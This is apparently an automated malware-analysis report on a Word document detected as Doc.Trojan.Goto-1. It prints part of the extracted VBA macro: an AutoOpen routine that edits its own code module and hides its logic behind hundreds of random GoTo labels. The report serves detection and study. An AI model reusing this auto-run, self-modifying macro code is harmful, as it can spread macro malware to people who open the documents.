MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious OLE document containing a legacy WordBasic AutoOpen macro. The VBA code is heavily obfuscated using numerous GoTo statements and string concatenations, making it difficult to determine its exact payload. However, the presence of the AutoOpen macro and the ClamAV detection indicate a malicious intent, likely to download and execute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Trojan.Goto-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Goto-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54286 bytes |
SHA-256: 1f356f28537d52bbcb3817844de59b26f51548843b197c6fca7fc87fbe4f5426 |
|||
|
Detection
ClamAV:
Doc.Trojan.Goto-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim gto% 'number of goto's
Dim i% 'i
Dim x% 'x
Dim lb% 'number of char's in label
Dim pos% 'position to put goto's at
Dim pos2% 'position to put the labels at
Dim ch$ 'char var
Dim ch2$ 'char2 var
Dim ch3$ 'char3 var
Dim lbl$ 'label var
Dim lbl2$ 'label2 var
Dim lbl3$ 'label3 var
Dim buf$ 'buffer
Set cm = Application.VBE.ActiveVBProject.VBComponents("Module1").CodeModule
Call MsgBox("1: End of Declarations", vbOKOnly)
Randomize
pos = cm.CountOfLines / (Int(6 - 4) * Rnd + 4) - 2
GoTo eddmfgjqdAdhEb
plefdrahbAcgIb:
GoTo EgIbsFCIFfg
MfEaaKBNLeg:
For i = 1 To gto
Call MsgBox("2: Start of gto loop", vbOKOnly)
GoTo aVebacSBdeibhiF
eFlbhcILgagbcqD:
Call MsgBox("3: Start of lb loop", vbOKOnly)
For x = 1 To lb
GoTo DumJfHG
KqiMtUN:
GoTo udADchg
ogDFhft:
GoTo WdfMpAB
DumJfHG:
GoTo OjKeceqKEMkKeC
GoTo biCHBaITiFAPbHdF
pfFECbQCeWBDpMaD:
lbl2 = lbl2 & ch2
GoTo CfAdfqkLNMdDeE
OjKeceqKEMkKeC:
GoTo ANQAdkA
GJQEffE:
GoTo eSdPBORADec
dQaHARHDLhd:
GoTo baeDD
dagEA:
GoTo KHEabDNEcAcaeBEejBQ
GoTo LtGBb
FgCJa:
GoTo GbGAgmComJC
OlAJnrKmaFJ:
GoTo BaFEd
McFFk:
GoTo AoDeBDasjPFpgNjCDfabF
AbKtEEtdlRJnrCcFAnagS:
GoTo PbmCnsIBKMAedkbibBBd
DqbLqbDEEKAqxqaatEBd:
GoTo LePcgcObBjipGahpd
AiDcjfYjQgqgEgfbd:
GoTo KEcdQboleDcDLEmc
ELjlFjpdaBlECRle:
GoTo AXcRbaqb
BCdGiucl:
GoTo kbqMJDdfFceaeB
accOAGaiCebfhI:
GoTo EfiNgEEcBKaaP
PaaOfCEjALooL:
GoTo epbKFHdoFdjwbO
kbqMJDdfFceaeB:
GoTo eusBgecIafgIk
ogbNcqaKcaoHb:
GoTo bhkBdbsxCcEgHbddGAqBfk
ohbMdbguEaMkAlbaNIcDas:
NCmhBejhaItNCBfn:
GoTo HahCgJhfDvBgCHhGIC
GfdHaAagJaSnGAuDGE:
DAVBNIc:
GoTo CkaArGdaCtBcAMmBIO
HahCgJhfDvBgCHhGIC:
GoTo cCMGbdIhHElcCAd
bNFDbaCjBDfdKCc:
GoTo INeAMeUFDjmKIvmmj
DEgCIbIGJbcIHfaib:
GoTo bAAAbkAnCEbdFEb
cCMGbdIhHElcCAd:
GoTo cISjodS
lABcjlB:
dSEBKAsadh:
GoTo iRFumkA
cISjodS:
GoTo YDAJLALbia
FBCEGDThkd:
GoTo noeFAHISaerKkFpBjCm
gdwFADFIbcaFeCnEqBj:
GoTo HADOFPJana
YDAJLALbia:
GoTo GpefFSSbF
EbqeEIEiB:
CmaBaoeEeaRRbAGPHcoqEA:
GoTo GAMgcCtKdk
GoTo JqaBdcfAlmIAbRFNGpaaEN
HobHygeBbeCCcMCBLhhdKJ:
GoTo qBDIiChbKgN
cDAAgEdbOoJ:
eJmmtgOP:
dByfcdEl:
GoTo nRgBgEkKJccvA
pJaEoIdQTbftA:
aibjAdqBAjEimAEicF:
dCNbccaDcAJUld:
GoTo rjbmAocEFjPsdABguP
bbgeAsgLBfAhfCCnbE:
GoTo PCoAAcACPME
EAaPFbUBTEV:
GoTo lABcjlB
GoTo hhkkHV
uknaCI:
GoTo gwiGJgDaBmdhO
GoTo lfmbNA
hhkkHV:
GoTo CPKmAMqaAfdQi
EFSkRAndAecHb:
fPatApDagHnbiLvFsbly:
rjffAcEceBGrAagAdmcDC:
GoTo lCicIrMibJakhDjEajkm
bBybGbFedDemcLaFbcde:
GoTo AIEga
CJBtc:
GoTo BCdGiucl
GoTo cDidFBoiB
dHcjGFebO:
hvCAGJAhAICFEjCpQkeAQ:
GoTo fBhbADciX
cDidFBoiB:
GoTo EjadbCDedPOu
GnqibGIdaGAc:
GoTo KGkcbfpAuHmhFUccajb
GoTo OacceDBesBCb
EjadbCDedPOu:
GoTo EFsisFMdf
DIaahBAel:
LgcaEevbcc:
GoTo ABKSccNfGBh
GoTo BIbeCnGOaOjDbkGcaAJHI
CQlcAaOEbIhRggGcdDBMH:
DqgaEhulnw:
GoTo aAAIBFCaCGM
mNFONGTdCEF:
GoTo SJccfgECam
GoTo ibbbfMgNeBLdgKfbRE
gnlgeJmHdPEncBabHE:
HjbNCCaAPl:
GoTo aabgDEnabAcia
hgexAAlbcMkkh:
GSIQciC:
GoTo egpfDHgczXicc
aabgDEnabAcia:
GoTo auIqq
tqGgc:
HaAIlmrdccJOmg:
GoTo bcEnh
auIqq:
GoTo bGoBTdEScBdBBLAfabDP
aUfDNhDHbDlAEFCmeyST:
bCrdegIE:
GoTo aIiUChBBkIkDAABejbAL
bGoBTdEScBdBBLAfabDP:
GoTo GVmdDlEAcSdJdmTgaJJQB
BIbeCnGOaOjDbkGcaAJHI:
GoTo BddfBauikf
GoTo CQlcAaOEbIhRggGcdDBMH
GVmdDlEAcSdJdmTgaJJQB:
GoTo jbdkjFoEeKCirJdcDH
ibbbfMgNeBLdgKfbRE:
GoTo LKAded
CDTedd:
hDbgDLLwdfDebNkbCcABa:
GoTo CJBtc
GoTo cAcaBFCcdfNboHduKrELe
gHmaBOJhidBixJfcGaDAl:
GoTo aJacH
hHdcH:
GoTo HchcbcbCDHamc
GoTo eNASDbAGn
cIKHUaDPb:
ADddD:
GoTo lcHHAKEfAAINDkCkMirEU
GoTo SDatB
BAmcH:
GoTo kBbIaAAaJaDmandEKt
rBaCeHAdGgQiknpBEo:
GoTo OlAJnrKmaFJ
GoTo udRKfMHlLcDbKWJcJf
kfCSoKFdJbDiEEBaFn:
alGbK:
GoTo qjBCcGPaJ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.